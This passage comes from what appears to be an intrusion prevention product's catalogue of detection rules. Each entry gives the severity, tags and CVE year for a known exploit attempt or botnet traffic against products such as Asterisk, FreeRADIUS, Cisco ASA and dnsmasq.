About this situation: Buffer overflow exploit against Trend Micro ServerProtect
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, x86, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow
Description:
Back to top

Generic_Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF

About this situation: Buffer overflow exploit against Trend Micro's ServerProtect detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
Description:
Back to top

Generic_UDP-Anviz-CrossChex-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Anviz CrossChex detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Anviz CrossChex, CVE2019, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1224-5242
Vulnerability: Anviz-CrossChex-Buffer-Overflow
Description:
Back to top

Generic_UDP-AnyDesk-GUI-Format-String-Write

About this situation: An attempt to exploit a vulnerability in AnyDesk detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, AnyDesk, CVE2020, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: AnyDesk-GUI-Format-String-Write
Description:
Back to top

Generic_UDP-Atftp-TFTP-Server-Error-Packet-DoS

About this situation: An attempt to exploit a vulnerability in atftp TFTP Server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, atftpd, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1193-5242
Vulnerability: Atftp-TFTP-Server-Error-Packet-DoS
Description:
Back to top

Generic_UDP-Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Avaya Windows Portable Device Manager detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Avaya Windows Portable Device Manager, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Azeotech-DAQFactory-NETB-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Azeotech DAQFactory detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Azeotech DAQFactory, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1323-5242
Vulnerability: Azeotech-DAQFactory-NETB-Buffer-Overflow
Description:
Back to top

Generic_UDP-BACnet-Atomic-Read-File

About this situation: An attempt to read a file
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Description:
Back to top

Generic_UDP-BACnet-Atomic-Write-File

About this situation: An attempt to write to a file
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Description:
Back to top

Generic_UDP-Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in bash detected
Context: UDP Packet Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-606-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

Generic_UDP-Beckhoff-Twincat-DoS

About this situation: An attempt to exploit a vulnerability in Beckhoff TwinCAT detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Beckhoff TwinCAT, CVE2011, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Beckhoff-Twincat-DoS
Description:
Back to top

Generic_UDP-BitTorrent-UDP-Traffic

About this situation: BitTorrent traffic detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

Generic_UDP-Bomberclone-Buffer-Overflow

About this situation: An attempt to exploit a Bomberclone Buffer Overflow vulnerability detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Bomberclone, CVE2006, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Bomberclone-Buffer-Overflow
Description:
Back to top

Generic_UDP-BSD-Nfs-Server-Readdir-Request-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in FreeBSD Nfs server detected
Context: UDP Packet Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2013, FreeBSD not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-596-5211
Vulnerability: FreeBSD-Nfs-Server-Readdir-Request-Memory-Corruption
Description:
Back to top

Generic_UDP-CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Handle-T

About this situation: Detects SunRPC requests that exploit a code execution vulnerability in CA BrightStor media server
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, x86, Computer Associates BrightStor, CVE2007, Windows not specific, Computer Associates BrightStor not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Vulnerability: CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Code-Execution-Vulnerability
Description:
Back to top

Generic_UDP-Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Check Point Software Technologies Provider-1 detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FireWall-1, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Check-Point-VPN-1-ASN.1-Decoding-Heap-Overflow
Description:
Back to top

Generic_UDP-Chrome-Remote-Desktop-Usage

About this situation: Chrome Remote Desktop usage detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Google Chrome Remote Desktop, Any Operating System not specific, Remote Control
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Vulnerability: Chrome-Remote-Desktop-Usage
Description:
Back to top

Generic_UDP-Cisco-Adaptive-Security-Appliance-IKEv1-And-IKEv2-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Systems Adaptive Security Appliance (ASA) detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: Cisco-Adaptive-Security-Appliance-IKEv1-And-IKE2-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Cisco-ASA-SNMP-ExtraBacon-Exploit

About this situation: An attempt to exploit a vulnerability in Cisco ASA SNMP detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-796-5211
Vulnerability: Cisco-Adaptive-Security-Appliance-SNMP-Remote-Code-Execution-Vulnerability
Description:
Back to top

Generic_UDP-Cisco-IKE-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Cisco Internet Key Exchange version 1 detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco IKE, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Vulnerability: Cisco-IKE-Information-Disclosure
Description:
Back to top

Generic_UDP-Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability

About this situation: A Cisco Secure ACS EAP-TLS Authentication Bypass vulnerability
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Secure ACS, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1001-5242
Vulnerability: Cisco-Secure-ACS-EAP-TLS-Authentication-Bypass-Vulnerability
Description:
Back to top

Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Citrix Systems Provisioning Services detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Provisioning Services, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-438-4219
Vulnerability: Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow
Description:
Back to top

Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow-2

About this situation: An attempt to exploit a vulnerability in Citrix Systems Provisioning Services detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Provisioning Services, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow
Description:
Back to top

Generic_UDP-Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Citrix Provisioning Services detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Provisioning Services, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-CMSD-Procedure-0x0a

About this situation: Access to vulnerable rpc.cmsd procedure
Context: UDP Packet Unknown
Severity: 1
Tags: HP-UX, Any Hardware, CVE2010, HP-UX not specific, Protocol Information
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Description:
Back to top

Generic_UDP-Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow

About this situation: An attempt to exploit a Computer Associates BrightStor Arcserve Backup MediaSRV.exe Buffer Overflow vulnerability.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Computer-Associates-BrightStor-Arcserve-Backup-MediaSRV.exe-Buffer-Overflow
Description:
Back to top

Generic_UDP-Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Corosync Cluster Engine detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Corosync Cluster Engine, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow
Description:
Back to top

Generic_UDP-Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in cURL Project cURL detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: Curl-And-Libcurl-TFTP-OACK-blksize-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-D-Link-DAP-1160-Unauthenticated-Remote-Command

About this situation: An attempt to exploit a vulnerability in D-Link DAP-1160 detected.
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1191-5242
Vulnerability: D-Link-DAP-1160-Unauthenticated-Remote-Reboot
Description:
Back to top

Generic_UDP-D-Link-Devices-Unauthenticated-ssdpcgi-RCE

About this situation: An attempt to exploit a vulnerability in D-Link ssdpcgi function detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, D-Link, CVE2019, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: D-Link-Devices-Unauthenticated-ssdpcgi-RCE
Description:
Back to top

Generic_UDP-Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Dhcpcd Dhcpcd detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Dhcpcd, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow
Description:
Back to top

Generic_UDP-Dhcpd-Packet-Size-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in dhcpcd detected
Context: UDP Packet Unknown
Severity: 7
Tags: Debian GNU/Linux, SUSE Linux Enterprise Server 11, Any Hardware, Dhcpcd, CVE2012, Debian GNU/Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Dhcpcd-Packet-Size-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-Dhcpv6-Buffer-Overread-CVE-2023-38152

About this situation: An attempt to exploit a vulnerability in Windows DHCPv6 server detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2023-09, CVE2023, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Vulnerability: Dhcpv6-Buffer-Overread-CVE-2023-38152
Description:
Back to top

Generic_UDP-Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1037-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
Description:
Back to top

Generic_UDP-Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write
Description:
Back to top

Generic_UDP-Digium-Asterisk-CSeq-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1037-5242
Last changed: sgpkg-ips-1037-5242
Vulnerability: Digium-Asterisk-CSeq-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service

About this situation: A vulnerability in Digium Asterisk Business Edition
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2009, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Description:
Back to top

Generic_UDP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in Digium Asterisk detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2008, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1037-5242
Vulnerability: SIP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
Description:
Back to top

Generic_UDP-Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1121-5242
Vulnerability: Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
Description:
Back to top

Generic_UDP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2019, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Description:
Back to top

Generic_UDP-Digium-Asterisk-RTP-Stack-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Digium-Asterisk-RTP-Stack-Information-Disclosure
Description:
Back to top

Generic_UDP-Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, Digium Certified Asterisk, CVE2018, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1129-5242
Vulnerability: Digium-Asterisk-Unnegotiated-RTP-Payload-Type-Denial-Of-Service
Description:
Back to top

Generic_UDP-Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: Digium-Multiple-Asterisk-Products-IAX2-Channel-Driver-Denial-of-Service
Description:
Back to top

Generic_UDP-Dnsmasq-Dhcpv6-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in DNSmasq/Mikrotik DNSmasq detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Dnsmasq, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Dnsmasq-Dhcpv6-Information-Disclosure
Description:
Back to top

Generic_UDP-Dnsmasq-Dhcpv6-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in DNSmasq/Mikrotik DNSmasq detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Dnsmasq, CVE2017, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1131-5242
Vulnerability: Dnsmasq-Dhcpv6-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-DTLS-ClientHello-Request

About this situation: A DTLS ClientHello request detected
Context: UDP Packet Unknown
Severity: 1
Tags: Windows, Any Hardware, MS2025-04, CVE2025, Windows not specific, Protocol Information
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Windows-Remote-Desktop-Services-Remote-Code-Execution-CVE-2025-27480
Description:
Back to top

Generic_UDP-DTLS-ServerHello-Request

About this situation: A DTLS ServerHello Request detected
Context: UDP Packet Unknown
Severity: 1
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: OpenSSL-DTLS-Recursion-Denial-Of-Service
Description:
Back to top

Generic_UDP-Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Enterasys Network Management Suite detected
Context: UDP Packet Unknown
Severity: 7
Tags: Windows, Any Hardware, Enterasys, CVE2011, Windows not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-656-5211
Vulnerability: Enterasys-Network-Management-Suite-Syslog-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_UDP-Ethereal-NetFlow-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ethereal detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ethereal, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-416-4219
Vulnerability: Ethereal-Multiple-Vulnerabilities
Description:
Back to top

Generic_UDP-FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure

About this situation: An attempt to exploit a vulnerability in FreeBSD Project Routed detected
Context: UDP Packet Unknown
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2015, FreeBSD not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: FreeBSD-Routed-Daemon-Routing-Information-Protocol-Assertion-Failure
Description:
Back to top

Generic_UDP-FreeRADIUS-Access-Request-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in FreeRADIUS server detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, FreeRADIUS, CVE2009, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-415-4219
Vulnerability: FreeRADIUS-Access-Request-Denial-Of-Service
Description:
Back to top

Generic_UDP-FreeRADIUS-Ascend-Send-Receive-Secret-DoS

About this situation: An attempt to exploit a vulnerability in FreeRADIUS detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, FreeRADIUS, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: FreeRADIUS-Ascend-Send-Receive-Secret-DoS
Description:
Back to top

Generic_UDP-FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeRADIUS Server Project FreeRADIUS detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FreeRADIUS, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1635-5242
Vulnerability: FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow
Description:
Back to top

Generic_UDP-FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeRADIUS Server Project FreeRADIUS detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FreeRADIUS, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-986-5242
Vulnerability: FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow
Description:
Back to top

Generic_UDP-FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in FreeRADIUS Server Project FreeRADIUS detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, FreeRADIUS, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read
Description:
Back to top

Generic_UDP-Glutton-Backdoor-C2-Traffic

About this situation: Glutton backdoor activity detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, Glutton malware, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Glutton-Backdoor-Activity
Description:
Back to top

Generic_UDP-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Free Software Foundation GnuTLS detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2012, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-451-4333
Vulnerability: GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Description:
Back to top

Generic_UDP-Heimdal-KDC-ASN1-der-Length-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in h5l.org Heimdal detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Heimdal, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1077-5242
Vulnerability: Heimdal-KDC-ASN1-der-Length-Denial-Of-Service
Description:
Back to top

Generic_UDP-HNS-Botnet-C2-Traffic

About this situation: Hide and Seek botnet C2 traffic was detected
Context: UDP Packet Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: HNS-Botnet-C2-Traffic
Description:
Back to top

Generic_UDP-HP-Intelligent-Management-Center-Dbman-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center service detected
Context: UDP Packet Unknown
Severity: 7
